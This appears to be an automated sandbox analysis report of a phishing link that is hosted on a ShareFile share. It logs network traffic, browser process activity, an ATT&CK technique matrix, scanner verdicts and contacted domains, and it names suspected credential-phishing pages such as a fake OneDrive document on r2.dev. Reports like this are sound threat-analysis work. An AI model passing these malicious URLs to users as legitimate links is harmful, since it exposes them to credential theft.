Source: unknownNetwork traffic detected: HTTP traffic on port 53690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53644 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53667 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53594
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53593
Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53619 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53598
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53597
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53596
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53595
Source: unknownNetwork traffic detected: HTTP traffic on port 53689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53599
Source: unknownNetwork traffic detected: HTTP traffic on port 53633 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53649
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53648
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53647
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53642
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53641
Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53640
Source: unknownNetwork traffic detected: HTTP traffic on port 53688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53642 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53646
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53644
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53643
Source: unknownNetwork traffic detected: HTTP traffic on port 53665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53659
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53658
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53653
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53652
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53651
Source: unknownNetwork traffic detected: HTTP traffic on port 53702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53650
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53657
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53656
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53655
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53654
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53599 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53610 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53631 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53669
Source: unknownNetwork traffic detected: HTTP traffic on port 53621 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53664
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53663
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53662
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53661
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53668
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53667
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53666
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53665
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53609 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53671
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53670
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53675
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53674
Source: unknownNetwork traffic detected: HTTP traffic on port 53643 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53673
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53672
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53679
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53678
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53677
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53676
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53682
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53681
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53680
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53654 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53623 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53600 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53595 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53669 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53646 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53681 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53635 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53611 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53596 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53670 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53647 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53622 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53658 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.17:53593 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:53594 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:53602 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:53617 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.75:443 -> 192.168.2.17:53709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:53711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.176:443 -> 192.168.2.17:53713 version: TLS 1.2
Source: classification engineClassification label: mal64.phis.win@19/171@52/29
Source: chromecache_215.1.drInitial sample: \260\301\200\210}\001\323\036B\032\207\252`\311\315'\373TE\222\024_u\232\006\011\357;B\2125\037\312K\345\222\037B\257\222Y\214\021M\225\(#\227Q\003!\372-\234\346'0\360-\345\005\372\312/r\243es
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2012,i,10480968910564340078,1403565165516769674,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2012,i,10480968910564340078,1403565165516769674,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected

Persistence and Installation Behavior

barindex
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlLLM: Page contains button: 'VIEW DOCUMENT' Source: '3.6.pages.csv'
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 238Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 215
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 215Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
1
Spearphishing Link
Windows Management Instrumentation1
Browser Extensions
1
Process Injection
11
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd00%Avira URL Cloudsafe
https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://pub-10305130932840cc9846324aa165bbf7.r2.dev/favicon.ico0%Avira URL Cloudsafe
https://averellharriman.sf-api.com/sf/v3/Capabilities0%Avira URL Cloudsafe
https://tmmc-radwvaste.com/200/#0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/e0aa737e437fa075dfed.js0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/index.073b02341601d3e1503c.js0%Avira URL Cloudsafe
https://averellharriman.sf-api.com/sf/v3/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)/Items(stc239a0-b110-4a4c-8267-41d8a0de3bab)/ProtocolLinks(Web)?action=View0%Avira URL Cloudsafe
https://tmmc-radwvaste.com/200/0%Avira URL Cloudsafe
https://o365.alnassers.net/0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/50838dcfa76323d03647.js0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/css/spinner.css0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/c3b78c86faf44765071f.js0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/5be3ba1b444ac539eaf5.js0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/d178f6eceb0126b1e292.js0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/2efeefafc2bb68a97d33.js0%Avira URL Cloudsafe
https://averellharriman.sf-api.com/sf/v3/Items/ContentViewer0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/ba7dfd1a6326f1b75478.js0%Avira URL Cloudsafe
https://averellharriman.sf-api.com/sf/v3/Accounts/Branding0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/manifest.json0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/7ba6967109e88a8ecd8d.js0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/1c992ae0c14e95098d9a.js0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/css/sharefilebrand/sf-spinner.svg0%Avira URL Cloudsafe
https://averellharriman.sharefile.com/bundles/5626aad50bfaf67fedc0.js0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
fastly-tls12-bam.nr-data.net
162.247.243.29
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      sf-renderx-us-east-1.sharefile.com
      3.33.222.159
      truefalse
        high
        averellharriman.sharefile.com
        13.248.193.251
        truefalse
          high
          0093b71e39a6.us-east-1.sdk.awswaf.com
          13.32.121.3
          truefalse
            high
            js-agent.newrelic.com
            162.247.243.39
            truefalse
              high
              events.launchdarkly.com
              52.206.112.129
              truefalse
                high
                sf-cv.sharefile.com
                76.223.1.166
                truefalse
                  high
                  piletfeed-cdn.sharefile.io
                  13.227.219.30
                  truefalse
                    high
                    0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                    18.239.18.50
                    truefalse
                      high
                      o365.alnassers.net
                      147.79.74.176
                      truefalse
                        unknown
                        tmmc-radwvaste.com
                        147.182.200.48
                        truefalse
                          unknown
                          s3-w.us-east-1.amazonaws.com
                          54.231.233.161
                          truefalse
                            high
                            51.138.111.34.bc.googleusercontent.com
                            34.111.138.51
                            truefalse
                              unknown
                              code.jquery.com
                              151.101.130.137
                              truefalse
                                high
                                o49063.ingest.sentry.io
                                34.120.195.249
                                truefalse
                                  high
                                  cdnjs.cloudflare.com
                                  104.17.25.14
                                  truefalse
                                    high
                                    www.google.com
                                    142.250.185.132
                                    truefalse
                                      high
                                      api.ipify.org
                                      104.26.13.205
                                      truefalse
                                        high
                                        averellharriman.sf-api.com
                                        13.248.193.251
                                        truefalse
                                          high
                                          pub-10305130932840cc9846324aa165bbf7.r2.dev
                                          172.66.0.235
                                          truetrue
                                            unknown
                                            85.204.107.34.bc.googleusercontent.com
                                            34.107.204.85
                                            truefalse
                                              unknown
                                              app.launchdarkly.com
                                              unknown
                                              unknownfalse
                                                high
                                                citrix-sharefile-content.customer.pendo.io
                                                unknown
                                                unknownfalse
                                                  high
                                                  bam.nr-data.net
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    citrix-sharefile-data.customer.pendo.io
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      sf-temp-us-east-1-production.s3.amazonaws.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        171.39.242.20.in-addr.arpa
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          NameMaliciousAntivirus DetectionReputation
                                                          https://pub-10305130932840cc9846324aa165bbf7.r2.dev/favicon.icofalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://citrix-sharefile-data.customer.pendo.io/data/ptm.gif/74b07336-7560-45fc-7cd1-95032a784d52?v=2.253.1_prod&ct=1730835389607&jzb=eJzVk19P2zAUxb-Ln9vGseOk6VtRpzEhtlW0oIFQ5MQ3xVv-1XHKMtTvznWpInipNmnTxJud6-t7jn8nd0_E9g2QGdEKKqvznoxIaurHFkxidYkVP-J0ygWfxiKORmSnW21rk2iFTcnXD58XX5JV8m3rb88ub-MreosXyCyru8q-nJEsnIaKBmMBMh2rPMrHIqRsnGU89lWQMuBT7OlMgYcfrG3amefJHRgoigdpjC5lNWlxBbkuYJLVpXfYeTsNj17L0zjMUGNIMxVwiFKVyZwJyXhE41xRvLoxddOS2ROpC5X8jn537rWHqiuKf-V8j_rQTWVXMv00zLIvG_LL_vwxV5dwnt6sNvFyiSNyI0s4FC_6-ffr5cfALHbn3eO6wWIL2w6qDLFR5NhbQN9BJPajgXMJVp5kHL9vxkftbnlKfiGrTSc37kWgStZXjsPRkmuVTbOoS6krrL_Rha1_4jgHaTvjKNyRmocCPyEe0zcWFOD9BbkfAjAfxuMnJa3TRoXn-x6jLMBOfK9W104SmzDBJ36CrtVfT1DrhhzKlZ9x2dPV2fXN2lzYxZuA-UPARBy-ClhRS3UiYCHFZL7ngDl_R1csRjIT_Lv-CwA2AOAR298_A_pm1MEfalse
                                                            high
                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/index.jsfalse
                                                              high
                                                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                                high
                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.jsfalse
                                                                  high
                                                                  https://averellharriman.sharefile.com/bundles/50838dcfa76323d03647.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://averellharriman.sharefile.com/bundles/index.073b02341601d3e1503c.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/main.cssfalse
                                                                    high
                                                                    https://averellharriman.sharefile.com/bundles/e0aa737e437fa075dfed.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.jsfalse
                                                                      high
                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-esign-pilet/1.220.5/package/dist/index.jsfalse
                                                                        high
                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.jsfalse
                                                                          high
                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/index.jsfalse
                                                                            high
                                                                            https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmltrue
                                                                              unknown
                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.jsfalse
                                                                                high
                                                                                https://tmmc-radwvaste.com/200/false
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://citrix-sharefile-content.customer.pendo.io/guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADnkufXgGqv6M-p2xBSYIU/xBPyrN0M2r6IFxno71T0shlp-Qc.dom.json?sha256=OG9P3pymuWfB-ZaKqljhBPBaH2alktLkYBmVTjLKrSQfalse
                                                                                  high
                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/index.jsfalse
                                                                                    high
                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/index.jsfalse
                                                                                      high
                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/index.jsfalse
                                                                                        high
                                                                                        https://events.launchdarkly.com/events/diagnostic/5f33f5d44f29ea099db90d2afalse
                                                                                          high
                                                                                          https://averellharriman.sf-api.com/sf/v3/Capabilitiesfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/main.cssfalse
                                                                                            high
                                                                                            https://citrix-sharefile-data.customer.pendo.io/data/guide.json/74b07336-7560-45fc-7cd1-95032a784d52?id=12&jzb=eJyNUM2K2zAQfhedY1uW_BP71pIeetjdQtrCphQzlsaJQJYcWc5Slrx7xjmk9LL0Nhp9v_POLmY20YevmrWs-_bleffSfe9ez_n589Oh2fMD2zBQyi8u3iEgqm2leZGUCH2ih3pIyoqLRCnZ5LroBcotUZZgCXyKcZrbLIMLBrT2BCGYEVw604SDsZgqP2b3V3Yx-JbNsm8qldey4koXEuteKxhECULWvBk0J2lv9c-_md1i7YaNGEFDBNY-Cq2j-aCUBXdc4IiEQNf92LPro-hKhWna-RGMo_9_4hL1LvufhxgQ4hJwZu0v5mVV0gqdCn-miBpJ37LfZDyRgYufHva0ojprNl5meZ4JLgpi0hln49dIIhWlTPNuCl6z6_UG5AqPbQ&v=2.253.1_prod&ct=1730835389612false
                                                                                              high
                                                                                              https://citrix-sharefile-content.customer.pendo.io/guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6ATudKnb82a7viL5T2TM6g/E7DHnb1hOIm90y1iNNrpyuqjzow.dom.json?sha256=tTDEghJvK4ZEfjp-b5MZyPzNBxZZo7r5FOjFFYmu8iAfalse
                                                                                                high
                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.jsfalse
                                                                                                  high
                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-storage-plugin-pilet/1.2.0/package/dist/main.cssfalse
                                                                                                    high
                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-request-list-pilet/1.10.1/package/dist/main.cssfalse
                                                                                                      high
                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/main.cssfalse
                                                                                                        high
                                                                                                        https://averellharriman.sf-api.com/sf/v3/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)/Items(stc239a0-b110-4a4c-8267-41d8a0de3bab)/ProtocolLinks(Web)?action=Viewfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/402b74053d26323596b3.woff2false
                                                                                                          high
                                                                                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                                            high
                                                                                                            https://o49063.ingest.sentry.io/api/4506735163932672/envelope/?sentry_key=0be0069dd70d0ce2c63c650418f56fa6&sentry_version=7&sentry_client=sentry.javascript.react%2F7.100.1false
                                                                                                              high
                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/index.jsfalse
